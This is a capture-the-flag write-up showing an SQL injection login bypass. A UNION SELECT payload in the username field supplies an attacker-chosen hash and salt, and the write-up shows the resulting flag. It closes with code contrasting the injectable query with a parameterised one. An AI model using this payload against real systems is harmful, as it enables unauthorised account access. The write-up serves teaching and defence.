Posted by a guest, Dec 13th, 2018
Ok, so let's look at some important parts. We know it's sqlite3 again and how it is set up:

# CREATE TABLE users (
# id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
# username VARCHAR(255),
# password_hash VARCHAR(255),
# salt VARCHAR(255)
# );

And the login check (indentation restored from the paste; 'username' and 'password' are the submitted form values):

import hashlib

# the submitted username is dropped straight into the SQL text by str.format()
query = """SELECT id, password_hash, salt FROM users
WHERE username = '{0}' LIMIT 1""".format(username)
cursor.execute(query)

res = cursor.fetchone()
if not res:
    return "There's no such user {0}!\n".format(username)
user_id, password_hash, salt = res

# Python 2 string concatenation; the salt is whatever the query row contained
calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
    return "That's not the password for {0}!\n".format(username)
So we can see that the statement is using our supplied username, which is dropped straight into the SQL text by .format(), so it is SQL-injectable of course. They're selecting the id, password_hash, and salt from users where the username equals our input. Let's load up our own sample database, make some test queries and see what happens....

sqlite> insert into users values ("myid", "myusername", "0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60", "SUPER_SECRET_SALT");

sqlite> select id, password_hash, salt FROM users where username = 'myusername';

myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT

So, let's append a union select and supply exactly the row we would like back.

sqlite> select id, password_hash, salt FROM users where username = 'myusername' union select 'new id', 'new hash', 'new salt';

myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
new id|new hash|new salt

As you can see, by using a union select we can control the content of the result: the 'new id', 'new hash', and 'new salt' we supplied came back as a row. Looking at the code where it does the compare, we can see that it computes sha256(password + salt) and compares it to the password_hash that came back from the SQL statement, so both the salt and the expected hash come from a row we control.

Let's supply our own hash and compare them to each other!

>>> import hashlib
>>> print hashlib.sha256("lolpassword" + "lolsalt").hexdigest()
dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5
>>>

We just created our new sha256 hash with the salt 'lolsalt'; let's now submit our injection, carrying that hash, as the username.

username: z'%20union%20select%20'1','dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5','lolsalt

password:
lolpassword

The code will now take the password you submitted, hash it with the salt returned from the sql query, then compare it to the hash that was in the response (the salt and hash in the response are the ones we supplied in our injection). The two match, and you receive a message similar to this:

Welcome back! Your secret is: "The password to access level04 is: aZnRbEpSfX" (Log out)
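The root cause is the string-formatted query. As an added example (my code, not the challenge's), here is that lookup beside a parameterised one, run against a constructed in-memory SQLite copy of the users table, so the same username payload can be checked against both; make_db, lookup_safe and login are names I chose for this illustration.

```python
import hashlib
import hmac
import sqlite3


def make_db():
    """Constructed sample DB mirroring the challenge's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id VARCHAR(255) PRIMARY KEY, "
                 "username VARCHAR(255), password_hash VARCHAR(255), salt VARCHAR(255))")
    real_hash = hashlib.sha256(b"realpassword" + b"SUPER_SECRET_SALT").hexdigest()
    conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                 ("myid", "myusername", real_hash, "SUPER_SECRET_SALT"))
    return conn


def lookup_vulnerable(conn, username):
    # Same construction as the challenge: the username becomes SQL text.
    query = """SELECT id, password_hash, salt FROM users
    WHERE username = '{0}' LIMIT 1""".format(username)
    return conn.execute(query).fetchone()


def lookup_safe(conn, username):
    # Bound parameter: the value is data, never parsed as SQL, so a UNION
    # inside the username simply matches no row.
    query = "SELECT id, password_hash, salt FROM users WHERE username = ? LIMIT 1"
    return conn.execute(query, (username,)).fetchone()


def login(conn, username, password, lookup=lookup_safe):
    """Mirror of the challenge's check (Python 3 bytes); True on success."""
    row = lookup(conn, username)
    if row is None:
        return False
    _user_id, password_hash, salt = row
    calculated = hashlib.sha256(password.encode() + salt.encode()).hexdigest()
    # Constant-time comparison instead of != on the hex strings.
    return hmac.compare_digest(calculated, password_hash)


# The write-up's payload, URL-decoded (%20 -> space); the hash is computed
# here rather than copied, so the injected row matches "lolpassword"/"lolsalt".
INJECTED_HASH = hashlib.sha256(b"lolpassword" + b"lolsalt").hexdigest()
INJECTED_USERNAME = "z' union select '1','{0}','lolsalt".format(INJECTED_HASH)

if __name__ == "__main__":
    db = make_db()
    print("format() lookup returns:", lookup_vulnerable(db, INJECTED_USERNAME))
    print("? param lookup returns:", lookup_safe(db, INJECTED_USERNAME))
    print("login via format():", login(db, INJECTED_USERNAME, "lolpassword", lookup_vulnerable))
    print("login via ? param:", login(db, INJECTED_USERNAME, "lolpassword"))
```

With the bound parameter the union never executes, so the only row the check can see is the real one and the submitted password must match the stored hash.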